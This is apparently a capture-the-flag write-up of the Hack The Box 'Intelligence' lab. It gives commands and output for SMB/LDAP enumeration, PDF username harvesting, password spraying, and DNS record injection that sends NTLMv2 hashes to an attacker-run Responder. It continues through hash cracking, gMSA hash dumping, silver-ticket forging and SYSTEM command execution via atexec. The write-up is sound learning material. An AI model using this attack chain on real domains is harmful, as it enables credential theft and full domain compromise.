┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# nmap -sV -v -p- --min-rate=10000 10.10.10.248 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-10 10:05:43Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49686/tcp open msrpc Microsoft Windows RPC 49702/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC 64420/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Looks like a normal Active Directory setup for windows OS.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 4 07:18:41 2021
========================== | Target Information | ========================== Target ........... intelligence.htb RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================== | Enumerating Workgroup/Domain on intelligence.htb | ======================================================== [E] Can't find workgroup/domain ================================================ | Nbtstat Information for intelligence.htb | ================================================ Looking up status of 10.129.80.199 No reply from 10.129.80.199 ========================================= | Session Check on intelligence.htb | ========================================= [+] Server intelligence.htb allows sessions using username '', password '' [+] Got domain/workgroup name: =============================================== | Getting domain SID for intelligence.htb | =============================================== Domain Name: intelligence Domain Sid: S-1-5-21-4210132550-3389855604-3437519686 [+] Host is part of a domain (not a workgroup) ========================================== | OS information on intelligence.htb | ========================================== [+] Got OS info for intelligence.htb from smbclient: [+] Got OS info for intelligence.htb from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ================================= | Users on intelligence.htb | ================================= [E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED ============================================= | Share Enumeration on intelligence.htb | ============================================= Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on intelligence.htb ======================================================== | Password Policy Information for intelligence.htb | ======================================================== [E] Unexpected error from polenum: [+] Attaching to intelligence.htb using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:INTELLIGENCE.HT) [+] Trying protocol 445/SMB... [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. [E] Failed to get password policy with rpcclient ================================== | Groups on intelligence.htb | ================================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: =========================================================================== | Users on intelligence.htb via RID cycling (RIDS: 500-550,1000-1050) | =========================================================================== [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
================================================= | Getting printer info for intelligence.htb | ================================================= Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Jul 4 07:19:54 2021
Nothing much from here so let’s try anonymous login.
Anonymous Login
1 2 3 4 5 6 7 8
┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# smbclient -L //intelligence.htb Enter WORKGROUP\root's password: Anonymous login successful Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available
We have anonymous login but we have access to shares so let’s enumerate further.
LDAP
let’s do an ldap search for getting naming context for the AD(Active Directory).
┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# exiftool 2020-01-01-upload.pdf ExifTool Version Number : 12.16 File Name : 2020-01-01-upload.pdf Directory : . File Size : 26 KiB File Modification Date/Time : 2021:04:01 13:00:00-04:00 File Access Date/Time : 2021:07:09 23:58:06-04:00 File Inode Change Date/Time : 2021:07:09 23:58:06-04:00 File Permissions : rw-r--r-- File Type : PDF File Type Extension : pdf MIME Type : application/pdf PDF Version : 1.5 Linearized : No Page Count : 1 Creator : William.Lee ┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# exiftool 2020-12-15-upload.pdf ExifTool Version Number : 12.16 File Name : 2020-12-15-upload.pdf Directory : . File Size : 27 KiB File Modification Date/Time : 2021:04:01 13:00:00-04:00 File Access Date/Time : 2021:07:09 23:58:19-04:00 File Inode Change Date/Time : 2021:07:09 23:58:19-04:00 File Permissions : rw-r--r-- File Type : PDF File Type Extension : pdf MIME Type : application/pdf PDF Version : 1.5 Linearized : No Page Count : 1 Creator : Jose.Williams
Looks like we have two usernames Jose.Williams and William.Lee so let’s create a wordlist with different combination from their names and then brute it with kerbrute.
Kerberos
Thinking about the wordlist I came up with this wordlist below.
In this case you don’t need to create this wordlist cause the author name is one of the usernames but in Real like scenario or the in some difficult CTF you might need to create the wordlist as above.
So now we have two users before bruting the password let’s try and check for some low hanging fruits like GetNpuser. Got nothing from that so I though that there could be something else so I went on to check PDF’s.
Web
So I checked the naming of PDF is using the date and then followed by upload. so I tried to brute all the dates to get if there are anymore PDF’s. The below script will create a new PDF directory and download all pdf in that directory.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#!/usr/bin/python3
import requests import os
url = 'http://intelligence.htb/documents/'
for i inrange(2020,2022): for j inrange(1,13): for k inrange(1,31): date = f'{i}-{j:02}-{k:02}-upload.pdf' r = requests.get(url+date) #print (r.text) if (r.status_code == 200): print (date) #text = r.text os.system('mkdir pdf') os.system(f'wget {url}{date} -O pdf/{date}')
Now as the nummber of PDF files was more I wrote another python script to extract the usernames.
io = process('/bin/sh') io.sendline('ls -al pdf/') lst = io.recvrepeat(1).decode().strip().split('\n') files = [] for i inrange(3,len(lst)): tmp = lst[i].split(' ') files.append(tmp[10]) #print (files) f = open('users.txt','w') for i in files: io.sendline(f'exiftool pdf/{i}') tmp = (io.recvrepeat(1).decode().strip().split(': ')) f.write(tmp[-1] + '\n') print (tmp[-1])
f.close()
And it will create users.txt for you. now after getting users.txt you can retry NPUsers.py but it won’t help so let’s dig more into PDF. Now searching for password in pdf I wrote this simple python script to make my job easy.
for i in files: text = extract_text('pdf/'+i) if(keywords in text): print (i) print (text)
So this will give you the following output.
1 2 3 4 5 6 7 8 9 10
┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# python3 getpass.py 2020-06-04-upload.pdf New Account Guide
Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
So now we have default password so let’s try and spray that password at our username I tried kerbrute but didn’t yeild anything then I tried crackmapexec.
[\] Working on it... [+] IP: intelligence.htb:445 Name: unknown [-] Working on it... Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC .\IPC$\* fr--r--r-- 3 Sun Dec 31 23:58:45 1600 InitShutdown fr--r--r-- 4 Sun Dec 31 23:58:45 1600 lsass fr--r--r-- 3 Sun Dec 31 23:58:45 1600 ntsvcs fr--r--r-- 3 Sun Dec 31 23:58:45 1600 scerpc fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-39c-0 fr--r--r-- 3 Sun Dec 31 23:58:45 1600 epmapper fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-1b8-0 fr--r--r-- 3 Sun Dec 31 23:58:45 1600 LSM_API_service fr--r--r-- 3 Sun Dec 31 23:58:45 1600 eventlog fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-394-0 fr--r--r-- 3 Sun Dec 31 23:58:45 1600 atsvc fr--r--r-- 4 Sun Dec 31 23:58:45 1600 wkssvc fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-258-0 fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-4e8-0 fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-258-1 fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\49677 fr--r--r-- 3 Sun Dec 31 23:58:45 1600 01c597a227e270af fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\593 fr--r--r-- 5 Sun Dec 31 23:58:45 1600 srvsvc fr--r--r-- 3 Sun Dec 31 23:58:45 1600 efsrpc fr--r--r-- 3 Sun Dec 31 23:58:45 1600 netdfs fr--r--r-- 1 Sun Dec 31 23:58:45 1600 vgauth-service fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-240-0 fr--r--r-- 3 Sun Dec 31 23:58:45 1600 W32TIME_ALT fr--r--r-- 3 Sun Dec 31 23:58:45 1600 cert fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-9f0-0 fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-a7c-0 fr--r--r-- 1 Sun Dec 31 23:58:45 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-a50-0 IT READ ONLY .\IT\* dr--r--r-- 0 Mon Apr 19 01:50:58 2021 . dr--r--r-- 0 Mon Apr 19 01:50:58 2021 .. fr--r--r-- 1046 Mon Apr 19 01:50:58 2021 downdetector.ps1 NETLOGON READ ONLY Logon server share .\NETLOGON\* dr--r--r-- 0 Mon Apr 19 01:42:14 2021 . dr--r--r-- 0 Mon Apr 19 01:42:14 2021 .. SYSVOL READ ONLY Logon server share .\SYSVOL\* dr--r--r-- 0 Mon Apr 19 01:42:14 2021 . dr--r--r-- 0 Mon Apr 19 01:42:14 2021 .. dr--r--r-- 0 Mon Apr 19 01:42:14 2021 intelligence.htb Users READ ONLY .\Users\* dw--w--w-- 0 Mon Apr 19 02:20:26 2021 . dw--w--w-- 0 Mon Apr 19 02:20:26 2021 .. dr--r--r-- 0 Mon Apr 19 01:18:39 2021 Administrator dr--r--r-- 0 Mon Apr 19 04:16:30 2021 All Users dw--w--w-- 0 Mon Apr 19 03:17:40 2021 Default dr--r--r-- 0 Mon Apr 19 04:16:30 2021 Default User fr--r--r-- 174 Mon Apr 19 04:15:17 2021 desktop.ini dw--w--w-- 0 Mon Apr 19 01:18:39 2021 Public dr--r--r-- 0 Mon Apr 19 02:20:26 2021 Ted.Graves dr--r--r-- 0 Mon Apr 19 01:51:46 2021 Tiffany.Molina
We have access to few of the shares so let’s try and access those.
User.txt
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# smbclient //intelligence.htb/Users -U 'Tiffany.Molina' Enter WORKGROUP\Tiffany.Molina's password: Try "help" to get a list of possible commands. smb: \> cd Tiffany.Molina\Desktop\ smb: \Tiffany.Molina\Desktop\> get user.txt getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \Tiffany.Molina\Desktop\> quit ┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# cat user.txt 6fd023d238f2d2a63ecb521504fc1dd3
Now you have user.txt
PrivESC
Enumeration
The share that looked intresting to me was IT, so let’s look into that.
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# smbclient //intelligence.htb/IT -U 'Tiffany.Molina' Enter WORKGROUP\Tiffany.Molina's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Apr 18 20:50:55 2021 .. D 0 Sun Apr 18 20:50:55 2021 downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021 3770367 blocks of size 4096. 1463495 blocks available smb: \> get downdetector.ps1 getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
Looks like we have a powershell script let’s explore it.
1 2 3 4 5 6 7 8 9 10
# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($recordinGet-ChildItem"AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like"web*") { try { $request = Invoke-WebRequest-Uri"http://$($record.Name)"-UseDefaultCredentials if(.StatusCode -ne200) { Send-MailMessage-From'Ted Graves <Ted.Graves@intelligence.htb>'-To'Ted Graves <Ted.Graves@intelligence.htb>'-Subject"Host: $($record.Name) is down" } } catch {} }
Looks like we have the cronjob kind of thing running every five minutes we can see that it makes a request to webserver if we can bypass the check for validation which will be pretty easy as it uses web* as validation so not much problem there.
Now so I think that if we can add a dns in the record we can get the Ted.Graves hash using responder.
Basically the login behind this is simple we add the dns record and then the Ted will see if that record responds back or not and as soon as Ted checks that record we will get his hash in responder.
[+] Poisoning Options: Analyze Mode [ON] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Fingerprint hosts [OFF]
[+] Generic Options: Responder NIC [tun0] Responder IP [10.10.14.14] Challenge set [1122334455667788] Don't Respond To Names ['ISATAP'] [i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned. [Analyze mode: ICMP] You can ICMP Redirect on this network. [Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<--SNIP--->). [Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details. [Analyze mode: ICMP] You can ICMP Redirect on this network. [Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<---SNIP---->). [Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details. [+] Listening for events..
Now let’s try and use dnstool to deal with DNS records. you can find the dnstool over here.
krbrelayx
You can install it like below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
kali@kali:~/HackTheBox/Intelligence$ git clone https://github.com/dirkjanm/krbrelayx.git Cloning into 'krbrelayx'... remote: Enumerating objects: 98, done. remote: Total 98 (delta 0), reused 0 (delta 0), pack-reused 98 Unpacking objects: 100% (98/98), 65.74 KiB | 474.00 KiB/s, done. kali@kali:~/HackTheBox/Intelligence$ cd krbrelayx/ kali@kali:~/HackTheBox/Intelligence/krbrelayx$ ls addspn.py dnstool.py krbrelayx.py lib LICENSE printerbug.py README.md ┌──(root💀kali)-[~/krbrelayx] └─# python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.6 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK /root/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead res = dnsresolver.query(zone, 'SOA') [-] Adding new record [+] LDAP operation completed successfully
Now we our record in DNS so let’s wait for hash in responder. Note this may take up to 5 mins so be patient.
Now we have the hash for Ted.Graves let’s try and crack it. Over here I have used john you can also use hashcat for the same and there are also online cracker if you prefer that.
1 2 3 4 5 6 7 8 9 10
kali@kali:~/HackTheBox/Intelligence/krbrelayx$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt [sudo] password for kali: Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Mr.Teddy (Ted.Graves) 1g 0:00:00:23 DONE (2021-07-04 18:17) 0.04170g/s 450978p/s 450978c/s 450978C/s Mrz.deltasigma..Mr BOB Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed
Now we have the password for Ted.Graves So let’s enumerate the ldap as we already know we don’t have much on share. I got this tool from the link
we have a hash but unfortunately it’s not in rockyou.txt
1 2 3 4 5 6 7
kali@kali:~/HackTheBox/Intelligence/gMSADumper$ sudo john new --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3]) Warning: no OpenMP support for this hashtype, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:04 DONE (2021-07-04 18:30) 0g/s 3431Kp/s 3431Kc/s 3431KC/s markinho..*7¡Vamos! Session completed
So now the other option is to get the kerberos ticket using that hash. Famously or INFamously known as silver ticket attack on AD. So you can search Silver Ticket attack on Active Directory to learn more. Let’s try that.
[*] Getting TGT for user Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
It gives me error for the clock skew which is normal if you are familiar with Active Directory you just have to sync time between the server and machine. So let’s use ntpdate to do that. if you don’t have ntpdate you can install it using
1
sudo apt-get install ntpdate
then run the command
1
sudo ntpdate 10.10.10.248
Now the clock skew has been fixed let’s try silver ticket attack again. If the time doesn’t change try the following
[!] This will work ONLY on Windows >= Vista [*] Creating task \krUvePvx [*] Running task \krUvePvx [*] Deleting task \krUvePvx [*] Attempting to read ADMIN$\Temp\krUvePvx.tmp nt authority\system ┌──(root💀kali)-[~/hackthebox/machine/intelligence] └─# python3 atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt' Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista [*] Creating task \ocxiGfwW [*] Running task \ocxiGfwW [*] Deleting task \ocxiGfwW [*] Attempting to read ADMIN$\Temp\ocxiGfwW.tmp 5a582f5f16388c9959ef6d4b3dcbe914
Summary of knowledge
SMB enumeration
LDAP enumeration
write python script to batch download and extract data
brute Kerberos by using kerbrute and crackmapexec
add dns record by using krbrelayx’s dnstool then use responder get NTLMv2 Hash
crack NTLMv2 hash with john
use gMSADumper get svc_int’s hash
sync time between the server and machine by using ntpdate and chrony
use getST.py to get Administrator.ccache to perform a Silver Ticket attack
use smbclient.py or atexec.py and Silver Ticket to get user and root flag
Contact me
QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer
I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…
